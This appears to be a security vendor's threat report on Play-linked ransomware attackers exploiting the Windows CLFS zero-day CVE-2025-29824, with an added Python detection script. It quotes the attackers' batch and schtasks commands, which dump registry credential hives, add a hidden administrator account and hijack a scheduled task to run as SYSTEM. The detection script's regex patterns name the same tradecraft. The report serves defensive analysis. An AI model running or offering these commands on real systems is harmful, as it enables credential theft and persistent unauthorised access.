Ransomware Attackers Leveraged Privilege Escalation Zero-day
Exploit used by Play-linked attackers targets the CVE-2025-29824 zero-day vulnerability patched on April 8.
Attackers linked to the Play ransomware operation deployed a zero-day privilege escalation exploit during an attempted attack against an organization in the U.S. The attack occurred prior to the disclosure and patching of a Windows elevation of privilege zero-day vulnerability (CVE-2025-29824) in the Common Log File System Driver (clfs.sys) on April 8, 2025.
Although no ransomware payload was deployed in the intrusion, the attackers did deploy the Grixba infostealer, a custom tool associated with Balloonfly, the group behind the Play ransomware operation.
Balloonfly is a cybercrime group that has been active since at least June 2022 and uses the Play ransomware (also known as PlayCrypt) in attacks. The group has impacted a wide range of businesses and critical infrastructure in North America, South America, and Europe.
Attack analysis
The initial infection vector may have been a public-facing Cisco ASA firewall. The attackers then moved, by unknown means, to a Windows machine on the targeted network.
During the attack, the Balloonfly operators deployed a variety of samples and hacktools on this machine in addition to the Grixba infostealer and the exploit for CVE-2025-29824. Some of the samples were not available to us at the time of writing, but they were located in the Music folder under suspicious names masquerading as Palo Alto software (paloaltoconfig.exe, paloaltoconfig.dll) or, for example, 1day.exe.
To gather information on all available machines in the victim's Active Directory, the attackers executed the following command and saved the output to the file C:\Users\[REDACTED]\Music\AllWindows.csv:
powershell Import-Module ActiveDirectory; Get-ADComputer -Filter {enabled -eq $true} -properties *|select comment, description, Name, DNSHostName, OperatingSystem, LastLogonDate, ipv4address | Export-CSV C:\Users\[REDACTED]\Music\AllWindows.csv -NoTypeInformation -Encoding UTF8
Exploit execution
The attackers elevated privileges by exploiting a vulnerability in the Common Log File System (CLFS) kernel driver.
In order to interact with the driver, the exploit calls the CreateFileW() API, passing the string "\\.\LOG:\??\C:\ProgramData\SkyPDF\PDUDrv" as the lpFileName parameter. During that API call, the Windows kernel allocates a new FILE_OBJECT structure to represent that particular instance of a file open operation and then sends a request to the CLFS driver as identified by the "\\.\LOG:" filename prefix. The request is represented as an I/O Request Packet (IRP) with the major function code IRP_MJ_CREATE and instructs the driver to perform the actual open operation. Acting on this request, the driver allocates additional structures, including an undocumented structure, CClfsLogCcb. A pointer to the created CClfsLogCcb structure is stored in the FsContext2 field of the FILE_OBJECT structure, suggesting that the CClfsLogCcb structure could be a Context Control Block associated with that file open operation. Finally, the Windows kernel allocates a new file handle that refers to the created FILE_OBJECT structure. The exploit then attempts to perform two I/O operations around the same time on that file handle by calling different APIs from two threads.
From the first thread, the exploit calls the CloseHandle() API. During that API call, the Windows kernel closes the only file handle associated with the FILE_OBJECT structure previously discussed. To notify the driver that all outstanding file handles for the FILE_OBJECT structure have been closed, the Windows kernel sends an I/O Request Packet (IRP) with the major function code IRP_MJ_CLEANUP to the CLFS driver. When handling this request, the vulnerable versions of the driver deallocate the structure CClfsLogCcb.
From the second thread, the exploit calls the DeviceIoControl() API. The internal operations performed by the Windows kernel during that API call are determined by the sequence of operations across the two threads. In a particular scenario, the Windows kernel completes a lookup for the FILE_OBJECT structure referred to by the file handle during the DeviceIoControl() API call before the other thread closes the handle. The Windows kernel then sends an I/O Request Packet (IRP) with the major function code IRP_MJ_DEVICE_CONTROL to the CLFS driver that instructs the driver to perform the actual operation. That specific operation was picked when developing the exploit and involves the structure CClfsLogCcb.
However, the Windows kernel does not guarantee the relative ordering of the IRP_MJ_CLEANUP request from the first thread and the IRP_MJ_DEVICE_CONTROL request from the second thread. For example, the IRP_MJ_CLEANUP request may complete first, deallocating the structure CClfsLogCcb, before the IRP_MJ_DEVICE_CONTROL request is sent to the driver. Then, when handling the IRP_MJ_DEVICE_CONTROL request, the CLFS driver uses the memory pointer from the FsContext2 field of the FILE_OBJECT structure, which still refers to the location of the already deallocated CClfsLogCcb structure, and so operates on unexpected data. The exploit abuses this to modify kernel memory.
During the execution of the exploit, two files are created in the path C:\ProgramData\SkyPDF. The first file, PDUDrv.blf, is a Common Log File System base log file and is an artifact created during exploitation. The second file, clssrv.inf, is a DLL that is injected into the winlogon.exe process. This DLL has the ability to drop two additional batch files.
The first batch file, called servtask.bat, is stored in the “C:\ProgramData” folder. It is used to elevate privileges, dump the SAM, SYSTEM, and SECURITY Registry hives, and create a new user named LocalSvc that is added to the Administrators group:
mkdir C:\\ProgramData\\Events &
echo Yes | reg save hklm\\sam C:\\ProgramData\\Events\\Errors.evt &
echo Yes | reg save hklm\\security C:\\ProgramData\\Events\\Logs.evt &
echo Yes | reg save hklm\\system C:\\ProgramData\\Events\\Jobs.evt &
net user /add LocalSvc Dc_34%gfE62cvsa &
powershell.exe \"Add-LocalGroupMember -SID \"S-1-5-32-544\" -Member \"LocalSvc\"\" &
net localgroup Administrators LocalSvc /add &
reg add HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System /v LocalAccountTokenFilterPolicy /t REG_DWORD /d 1 /f &
reg add \"HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\SpecialAccounts\\UserList\" /v LocalSvc" /d 0 /t REG_DWORD &
icacls C:\\ProgramData\\Events /grant Everyone:F /inheritance:e /T &
call C:\\ProgramData\\cmdpostfix.bat &
timeout /t 3600 &
sc stop StorSvc &
sc start StorSvc &
del C:\\ProgramData\\Events\\Errors.evt &
del C:\\ProgramData\\Events\\Logs.evt &
del C:\\ProgramData\\Events\\Jobs.evt &
del C:\\ProgramData\\Events\\Tasks.evt &
del C:\\ProgramData\\Events\\Tmp.evt &
del C:\\ProgramData\\Events\\out.zip &
schtasks /Create /F /xml C:\\ProgramData\\CacheTask.xml /TN \\Microsoft\\Windows\\Wininet\\CacheTask &
rmdir C:\\ProgramData\\Events &
del C:\\ProgramData\\CacheTask.xml &
del C:\\ProgramData\\cmdpostfix.bat &
del C:\\ProgramData\\servtask.bat
The second batch file, named cmdpostfix.bat, is also created in the “C:\ProgramData” folder and is used to clean up the artifacts created by the exploit:
del C:\\ProgramData\\SkyPDF\\PDUDrv.blf &
del C:\\ProgramData\\SkyPDF\\ClsSrv.inf &
rmdir C:\\ProgramData\\SkyPDF
Ultimately, the exploit executes the batch files described above by repointing an existing scheduled task at servtask.bat, via the following commands:
- schtasks /Query /xml /TN \\Microsoft\\Windows\\Wininet\\CacheTask > C:\\ProgramData\\CacheTask.xml
- schtasks /Change /RU SYSTEM /TN \\Microsoft\\Windows\\Wininet\\CacheTask /TR C:\\ProgramData\\servtask.bat
- schtasks /Run /TN \\Microsoft\\Windows\\Wininet\\CacheTask
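The following is an added detection example (not code from Symantec or from the incident) that matches process-creation events against the tradecraft shown on this page: the Get-ADComputer enumeration above, the servtask.bat actions, and the CacheTask repointing. The event records are constructed to resemble a Sysmon or EDR export; hosts, parent images and the redacted password are assumptions.

```python
import re

# Constructed process-creation events (not from the incident): host, parent
# image, image, command line. WS02 carries a benign reg add as a control.
SAMPLE_EVENTS = [
    {"host": "WS01", "parent": "explorer.exe", "image": "powershell.exe",
     "cmdline": "powershell Import-Module ActiveDirectory; Get-ADComputer -Filter {enabled -eq $true} "
                "-properties * | Export-CSV C:\\Users\\bob\\Music\\AllWindows.csv -NoTypeInformation"},
    {"host": "WS01", "parent": "svchost.exe", "image": "cmd.exe",
     "cmdline": "cmd /c C:\\ProgramData\\servtask.bat"},
    {"host": "WS01", "parent": "cmd.exe", "image": "reg.exe",
     "cmdline": "reg save hklm\\sam C:\\ProgramData\\Events\\Errors.evt"},
    {"host": "WS01", "parent": "cmd.exe", "image": "net.exe",
     "cmdline": "net user /add LocalSvc [password-redacted]"},
    {"host": "WS01", "parent": "cmd.exe", "image": "schtasks.exe",
     "cmdline": "schtasks /Change /RU SYSTEM /TN \\Microsoft\\Windows\\Wininet\\CacheTask "
                "/TR C:\\ProgramData\\servtask.bat"},
    {"host": "WS02", "parent": "cmd.exe", "image": "reg.exe",
     "cmdline": "reg add HKLM\\SOFTWARE\\Contoso /v Setting /t REG_DWORD /d 1 /f"},
]

# One regex per tradecraft element taken from the commands on this page.
RULES = {
    "ad_computer_enum_to_csv": r"Get-ADComputer\b.*Export-CSV",
    "hive_save_as_evt": r"\breg\s+save\s+hklm\\(sam|security|system)\b.*\.evt",
    "localsvc_account_added": r"\bnet\s+user\s+/add\s+LocalSvc\b",
    "admins_by_sid": r"Add-LocalGroupMember\b.*S-1-5-32-544",
    "token_filter_policy_on": r"LocalAccountTokenFilterPolicy\b.*\s/d\s+1\b",
    "hidden_logon_account": r"Winlogon\\SpecialAccounts\\UserList\b",
    "cachetask_run_as_system": r"schtasks\s+/Change\b.*/RU\s+SYSTEM\b.*Wininet\\CacheTask",
    "programdata_batch_from_task": r"C:\\ProgramData\\(servtask|cmdpostfix)\.bat",
    "skypdf_exploit_path": r"C:\\ProgramData\\SkyPDF\\",
}
COMPILED = {name: re.compile(pat, re.IGNORECASE) for name, pat in RULES.items()}

def match_event(event):
    """Return the names of every rule whose pattern matches the command line."""
    hits = [name for name, rx in COMPILED.items() if rx.search(event["cmdline"])]
    # The batch path alone is weak evidence; keep it only when the launcher is
    # the task scheduler service host, as it is when CacheTask fires.
    if "programdata_batch_from_task" in hits and event["parent"].lower() != "svchost.exe":
        hits.remove("programdata_batch_from_task")
    return hits

def score_hosts(events):
    """Collect distinct rule hits per host; two or more on one host is an incident."""
    per_host = {}
    for ev in events:
        for name in match_event(ev):
            per_host.setdefault(ev["host"], set()).add(name)
    return {h: sorted(r) for h, r in per_host.items() if len(r) >= 2}
```

Running score_hosts(SAMPLE_EVENTS) flags WS01 with five distinct rules and leaves WS02 unflagged.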
Exploitation by multiple actors
The exploit (or similar exploits) may have been in the hands of multiple actors prior to the patching of CVE-2025-29824. When patching the vulnerability, Microsoft said that it had been exploited against a “small number of targets,” including organizations in the U.S., Venezuela, Spain, and Saudi Arabia. Microsoft said that the exploit had been deployed by the PipeMagic malware, which is often used by a group called Storm-2460 to deploy ransomware.
The nature of the exploitation by Storm-2460 appears different from the Balloonfly-linked activity discovered by Symantec. Microsoft said that the exploit had been launched in memory from a dllhost.exe process. The exploitation discovered by Symantec was not fileless.
Rare ransomware zero-day
While the use of zero-day vulnerabilities by ransomware actors is rare, it is not unprecedented. Last year Symantec found evidence that attackers linked to the Black Basta ransomware may have been exploiting a recently patched Windows privilege escalation vulnerability (CVE-2024-26169) as a zero-day.
That vulnerability was patched on March 12, 2024, and, at the time, Microsoft said there was no evidence of its exploitation in the wild. However, analysis of an exploit tool revealed evidence that it could have been compiled prior to patching, meaning at least one group may have been exploiting the vulnerability as a zero-day.
Protection/Mitigation
For the latest protection updates, please visit the Symantec Protection Bulletin.
Indicators of Compromise
If an IOC is malicious and the file is available to us, Symantec Endpoint products will detect and block that file.